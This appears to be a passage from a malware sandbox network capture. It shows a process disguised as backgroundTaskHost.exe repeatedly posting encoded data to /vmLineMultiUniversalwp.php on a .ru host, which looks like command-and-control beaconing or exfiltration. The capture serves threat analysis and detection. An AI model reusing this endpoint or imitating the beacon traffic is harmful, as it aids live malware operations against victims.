                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8362&min_rtt=1895&rtt_var=13644&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27223&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          33 | 192.168.2.4 | 49853 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:12.507492065 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          34 | 192.168.2.4 | 49854 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:12.567403078 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1820
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:12.920491934 CET | 1820 | OUT | Data Raw: 54 58 5b 57 50 58 5a 51 5c 5b 52 58 57 5c 58 5f 58 5c 5a 5b 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WPXZQ\[RXW\X_X\Z[RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)7B#8"&(*,9[5'+Q49(, +% 7%*!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:13.040081024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:13.309133053 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38sdXtXbjFXp7lVbmNAGy3hbw76BwpoHQiPfJo%2FbecEzr0XyteER%2F1uwNEFKUu6KwXsrfN2Ub7LKNYswPu3p2Fr7mMc%2BO5xjx6SvMV1q%2F2Lem%2B9RMVjJvprAEJUArHRTTBX6CmYf"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d112d3e7c84-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7792&min_rtt=2008&rtt_var=12321&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2137&delivery_rate=30239&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 55 28 3e 0d 08 35 06 24 12 2b 3d 2e 1d 31 30 28 1c 2e 21 01 5d 20 2f 2c 06 38 0b 39 5a 27 23 20 14 2b 3c 23 08 34 33 3f 54 24 0a 2a 5d 06 12 38 5b 2b 02 26 10 26 38 22 56 3e 0b 3a 06 26 26 0b 07 30 04 30 05 28 3c 22 02 25 3c 14 0f 3d 11 2a 59 3a 04 2c 0b 3b 12 06 55 36 13 21 53 08 13 20 50 26 57 20 0f 3d 33 36 04 31 30 21 13 27 3a 20 08 2a 28 02 51 27 00 29 07 3a 08 24 03 3f 33 3b 02 3a 10 05 04 3f 2e 0d 1f 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$U(>5$+=.10(.!] /,89Z'# +<#43?T$*]8[+&&8"V>:&&00(<"%<=*Y:,;U6!S P&W =3610!': *(Q'):$?3;:?.'"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          35 | 192.168.2.4 | 49860 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:12.706046104 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:13.060914993 CET | 2520 | OUT | Data Raw: 54 5e 5e 52 50 5f 5a 55 5c 5b 52 58 57 5b 58 5a 58 53 5a 59 52 52 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^RP_ZU\[RXW[XZXSZYRRQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(*+C (=P2#()<&#>*'>7Q 6(/3_(6Z#=&>;!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:13.158056021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:13.419574976 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S0GWypf0uML%2FbZfZBrurs%2FPQ%2FL7Hjknn3EgF7aKqqtX26aPOOG7iK0DzrQxfFgPbYc7wEb3poME2OmDyQIfgtku8EqK8eTGLAkCnY2EnaERkwcOZNQ61We%2FG9yCbcMPGO%2BUpVqfc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d11fb9a42f4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4017&min_rtt=1749&rtt_var=5192&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73392&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          36 | 192.168.2.4 | 49866 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:13.566013098 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:13.920480013 CET | 2520 | OUT | Data Raw: 54 50 5e 51 55 52 5f 54 5c 5b 52 58 57 5f 58 5b 58 53 5a 52 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^QUR_T\[RXW_X[XSZRRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)*0#(%U'_>?%Z!->'.$4-=)/8*&7.:X)!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:14.026065111 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:14.481647015 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5VWBZXFkxZruVBxjbh%2Bp8AT2No33YY1AvbbmH14kg76KEHCM0Zm6nFkVdTVOKz1F0KXnTd1LC%2B3WXGDioJTB%2BhiglIM8RnUqpkT9Ndf27xfCXFBOSHc7z9sQgtlKZ1hVbpKvxxZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1758654380-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3067&min_rtt=1702&rtt_var=3369&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=115643&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:08:14.514014006 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5VWBZXFkxZruVBxjbh%2Bp8AT2No33YY1AvbbmH14kg76KEHCM0Zm6nFkVdTVOKz1F0KXnTd1LC%2B3WXGDioJTB%2BhiglIM8RnUqpkT9Ndf27xfCXFBOSHc7z9sQgtlKZ1hVbpKvxxZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1758654380-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3067&min_rtt=1702&rtt_var=3369&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=115643&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          37 | 192.168.2.4 | 49872 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:14.644136906 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:14.999784946 CET | 2520 | OUT | Data Raw: 54 5a 5e 52 55 53 5a 5d 5c 5b 52 58 57 5e 58 5d 58 57 5a 5a 52 5d 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^RUSZ]\[RXW^X]XWZZR]Q\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->C (6%3()"5=3> "?;^+[7=*!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:15.107834101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:15.376902103 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcCikGrjVLT08I%2FNXIsm9QNNrklbtlCniw8fYnlwQK%2FECL65PpwXUmM7oPde%2BIAf3rIplYsJ18N2l9Sgz73K8rYoY%2FDNFaWJykEmr2rabVxdYiV4g266kpgPbRta9ACPs8kO7T1Y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d1e190d4261-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5405&min_rtt=2449&rtt_var=6832&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=55930&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          38 | 192.168.2.4 | 49873 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:15.511934996 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:15.857892990 CET | 2520 | OUT | Data Raw: 51 5e 5b 54 55 5f 5f 53 5c 5b 52 58 57 5b 58 52 58 54 5a 53 52 57 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[TU__S\[RXW[XRXTZSRWQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*$79T&#Y>?1Y6=6$.'7<?<(?[#-=;!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:15.971457958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:16.228559971 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zC05Fc85xsl745%2FVj6Hj2uVxtG9SMm7tfD8AP8npxPEjAJBQqcRC%2FreuVtEfA5gbD%2Fil%2FBsOfLJqMUrYlk0%2Fx6itXypz9x7nFsxE4y%2FjR3eU%2FyVLJC94CbDpgcgA9OGTuOgZhVih"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d238edc8c90-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6247&min_rtt=1944&rtt_var=9335&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=40145&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          39 | 192.168.2.4 | 49883 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:16.423849106 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:16.779786110 CET | 2520 | OUT | Data Raw: 54 59 5e 5f 50 5f 5a 5c 5c 5b 52 58 57 5b 58 52 58 52 5a 5c 52 54 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^_P_Z\\[RXW[XRXRZ\RTQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.()? 8%7>Z6!-10S#-)/3^<&7 *_*+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:16.900089025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:17.162370920 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDw0MoCTTFJwsrvLzZZmjLjyAsL9d4YhLMtAiUmBOFL6k80amBPq4BBOFkoMWVHdSGper4PEw2HlAvRgnj4U6gfsOP3FYTj32kigAqVQ77rLgNZaI0k0oS7u4pdi7x5r02cvGLDw"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d294cbe6a5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3659&min_rtt=1836&rtt_var=4334&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=88910&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          40 | 192.168.2.4 | 49891 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:17.311067104 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:17.670327902 CET | 2520 | OUT | Data Raw: 51 59 5e 53 55 53 5a 5c 5c 5b 52 58 57 5d 58 5c 58 51 5a 53 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^SUSZ\\[RXW]X\XQZSRRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)+7;9&?>)Z">"'? -"Q<<?< ==*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:17.766654015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.032565117 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhVvU6SbUSoxxBRUG7vVipKix42uLvz4TKPP70Ii9PcDrNvO6S%2FgwFr2W0dMYcQlps2r954QjM5%2BqTRj%2Bw3JUP2QW9Hd%2Bl76VKgYOWEnecwHtG68NICY%2BCKGvm2vdgw2OLvRhx%2Fo"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d2ec95119bb-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8258&min_rtt=1934&rtt_var=13374&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27793&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          41          192.168.2.4  49897        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:18.163480043 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          42          192.168.2.4  49898        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:18.335309029 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:18.685995102 CET  1844               OUT        Data Raw: 54 5f 5e 5f 55 5a 5a 53 5c 5b 52 58 57 5f 58 5f 58 53 5a 5a 52 51 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^_UZZS\[RXW_X_XSZZRQQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*411<*,!!=9'.4."P)?/\?5;Z4=*+;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:18.761543989 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.973823071 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:18.990113974 CET  961                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqs39bpmhnTYl%2BzXNbfXzE%2FdFXyIS1Av24E6nCiVN37226yCxQP%2Ba2nHllrLzZuxs4xhmxX%2F673qHlmxyROTOM6Hb%2FxRORff%2FnBXzf0Bs9LOoziZ13OFoAW%2BWrebB52I52Wgsm6U"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d34f8ce43d5-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=1722&rtt_var=4708&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=81228&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
